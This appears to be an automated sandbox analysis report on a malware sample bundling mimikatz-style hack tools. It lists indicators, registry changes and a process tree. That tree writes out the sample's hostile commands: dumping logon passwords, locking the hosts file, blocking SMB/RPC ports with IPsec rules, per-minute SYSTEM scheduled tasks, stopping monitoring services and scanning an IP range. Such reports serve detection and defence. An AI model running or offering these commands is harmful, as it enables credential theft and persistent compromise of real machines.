\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language phznlij.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language islkeazek.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1300 PING.EXE 4896 cmd.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00070000000234e7-6.dat nsis_installer_2 behavioral2/files/0x00110000000234f1-15.dat nsis_installer_1 behavioral2/files/0x00110000000234f1-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ phznlij.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" phznlij.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" phznlij.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" phznlij.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" phznlij.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing phznlij.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing gveebtguf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gveebtguf.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ phznlij.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1300 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3424 schtasks.exe 4868 schtasks.exe 3520 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4928 20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4928 20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe Token: SeDebugPrivilege 4140 phznlij.exe Token: SeDebugPrivilege 4720 phznlij.exe Token: SeDebugPrivilege 1012 vfshost.exe Token: SeDebugPrivilege 4928 gveebtguf.exe Token: SeLockMemoryPrivilege 852 gckntm.exe Token: SeLockMemoryPrivilege 852 gckntm.exe Token: SeDebugPrivilege 2912 gveebtguf.exe Token: SeDebugPrivilege 32 gveebtguf.exe Token: SeDebugPrivilege 1640 gveebtguf.exe Token: SeDebugPrivilege 2500 gveebtguf.exe Token: SeDebugPrivilege 4204 gveebtguf.exe Token: SeDebugPrivilege 2544 gveebtguf.exe Token: SeDebugPrivilege 4360 gveebtguf.exe Token: SeDebugPrivilege 4528 gveebtguf.exe Token: SeDebugPrivilege 5084 gveebtguf.exe Token: SeDebugPrivilege 4700 gveebtguf.exe Token: SeDebugPrivilege 5088 gveebtguf.exe Token: SeDebugPrivilege 4580 gveebtguf.exe Token: SeDebugPrivilege 1472 gveebtguf.exe Token: SeDebugPrivilege 1536 gveebtguf.exe Token: SeDebugPrivilege 2140 gveebtguf.exe Token: SeDebugPrivilege 5044 gveebtguf.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4928 20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe 4928 20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe 4140 phznlij.exe 4140 phznlij.exe 4720 phznlij.exe 4720 phznlij.exe 1012 xohudmc.exe 1856 hmdriy.exe 1904 phznlij.exe 1904 phznlij.exe 872 phznlij.exe 872 phznlij.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4928 wrote to memory of 4896 4928 20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe 84 PID 4928 wrote to memory of 4896 4928 20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe 84 PID 4928 wrote to memory of 4896 4928 20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe 84 PID 4896 wrote to memory of 1300 4896 cmd.exe 87 PID 4896 wrote to memory of 1300 4896 cmd.exe 87 PID 4896 wrote to memory of 1300 4896 cmd.exe 87 PID 4896 wrote to memory of 4140 4896 cmd.exe 93 PID 4896 wrote to memory of 4140 4896 cmd.exe 93 PID 4896 wrote to memory of 4140 4896 cmd.exe 93 PID 4720 wrote to memory of 1556 4720 phznlij.exe 95 PID 4720 wrote to memory of 1556 4720 phznlij.exe 95 PID 4720 wrote to memory of 1556 4720 phznlij.exe 95 PID 1556 wrote to memory of 1536 1556 cmd.exe 97 PID 1556 wrote to memory of 1536 1556 cmd.exe 97 PID 1556 wrote to memory of 1536 1556 cmd.exe 97 PID 1556 wrote to memory of 2332 1556 cmd.exe 98 PID 1556 wrote to memory of 2332 1556 cmd.exe 98 PID 1556 wrote to memory of 2332 1556 cmd.exe 98 PID 1556 wrote to memory of 2972 1556 cmd.exe 99 PID 1556 wrote to memory of 2972 1556 cmd.exe 99 PID 1556 wrote to memory of 2972 1556 cmd.exe 99 PID 1556 wrote to memory of 4900 1556 cmd.exe 100 PID 1556 wrote to memory of 4900 1556 cmd.exe 100 PID 1556 wrote to memory of 4900 1556 cmd.exe 100 PID 1556 wrote to memory of 244 1556 cmd.exe 101 PID 1556 wrote to memory of 244 1556 cmd.exe 101 PID 1556 wrote to memory of 244 1556 cmd.exe 101 PID 1556 wrote to memory of 4788 1556 cmd.exe 102 PID 1556 wrote to memory of 4788 1556 cmd.exe 102 PID 1556 wrote to memory of 4788 1556 cmd.exe 102 PID 4720 wrote to memory of 2812 4720 phznlij.exe 104 PID 4720 wrote to memory of 2812 4720 phznlij.exe 104 PID 4720 wrote to memory of 2812 4720 phznlij.exe 104 PID 4720 wrote to memory of 2416 4720 phznlij.exe 106 PID 4720 wrote to memory of 2416 4720 phznlij.exe 106 PID 4720 wrote to memory of 2416 4720 phznlij.exe 106 PID 4720 wrote to memory of 1304 4720 phznlij.exe 108 PID 4720 wrote to memory of 1304 4720 phznlij.exe 108 PID 4720 wrote to memory of 1304 4720 phznlij.exe 108 PID 4720 wrote to memory of 3500 4720 phznlij.exe 112 PID 4720 wrote to memory of 3500 4720 phznlij.exe 112 PID 4720 wrote to memory of 3500 4720 phznlij.exe 112 PID 3500 wrote to memory of 3104 3500 cmd.exe 114 PID 3500 wrote to memory of 3104 3500 cmd.exe 114 PID 3500 wrote to memory of 3104 3500 cmd.exe 114 PID 3104 wrote to memory of 1572 3104 wpcap.exe 115 PID 3104 wrote to memory of 1572 3104 wpcap.exe 115 PID 3104 wrote to memory of 1572 3104 wpcap.exe 115 PID 1572 wrote to memory of 4380 1572 net.exe 117 PID 1572 wrote to memory of 4380 1572 net.exe 117 PID 1572 wrote to memory of 4380 1572 net.exe 117 PID 3104 wrote to memory of 4520 3104 wpcap.exe 118 PID 3104 wrote to memory of 4520 3104 wpcap.exe 118 PID 3104 wrote to memory of 4520 3104 wpcap.exe 118 PID 4520 wrote to memory of 4928 4520 net.exe 120 PID 4520 wrote to memory of 4928 4520 net.exe 120 PID 4520 wrote to memory of 4928 4520 net.exe 120 PID 3104 wrote to memory of 2760 3104 wpcap.exe 121 PID 3104 wrote to memory of 2760 3104 wpcap.exe 121 PID 3104 wrote to memory of 2760 3104 wpcap.exe 121 PID 2760 wrote to memory of 2208 2760 net.exe 123 PID 2760 wrote to memory of 2208 2760 net.exe 123 PID 2760 wrote to memory of 2208 2760 net.exe 123 PID 3104 wrote to memory of 668 3104 wpcap.exe 124
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2168
-
C:\Windows\TEMP\ttheakefb\gckntm.exe"C:\Windows\TEMP\ttheakefb\gckntm.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Users\Admin\AppData\Local\Temp\20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe"C:\Users\Admin\AppData\Local\Temp\20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lvpuunkb\phznlij.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1300
-
-
C:\Windows\lvpuunkb\phznlij.exeC:\Windows\lvpuunkb\phznlij.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4140
-
-
-
C:\Windows\lvpuunkb\phznlij.exeC:\Windows\lvpuunkb\phznlij.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1536
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2972
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:244
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4788
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2812
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2416
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1304
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\teigzljfc\pekntqkbk\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\teigzljfc\pekntqkbk\wpcap.exeC:\Windows\teigzljfc\pekntqkbk\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4380
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4928
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2208
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:668 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1524
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1636 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1776
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:5032 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:440 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:5000
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\teigzljfc\pekntqkbk\islkeazek.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\teigzljfc\pekntqkbk\Scant.txt2⤵PID:4464
-
C:\Windows\teigzljfc\pekntqkbk\islkeazek.exeC:\Windows\teigzljfc\pekntqkbk\islkeazek.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\teigzljfc\pekntqkbk\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\teigzljfc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\teigzljfc\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4136 -
C:\Windows\teigzljfc\Corporate\vfshost.exeC:\Windows\teigzljfc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bjpbletlu" /ru system /tr "cmd /c C:\Windows\ime\phznlij.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bjpbletlu" /ru system /tr "cmd /c C:\Windows\ime\phznlij.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hbtnlbnbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lvpuunkb\phznlij.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1184 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hbtnlbnbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lvpuunkb\phznlij.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vhtckubbu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttheakefb\gckntm.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2464 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "vhtckubbu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttheakefb\gckntm.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4868
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4428
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2584
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4832
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4520
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4948
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4812
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3508
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4692
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3504
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2908
-
-
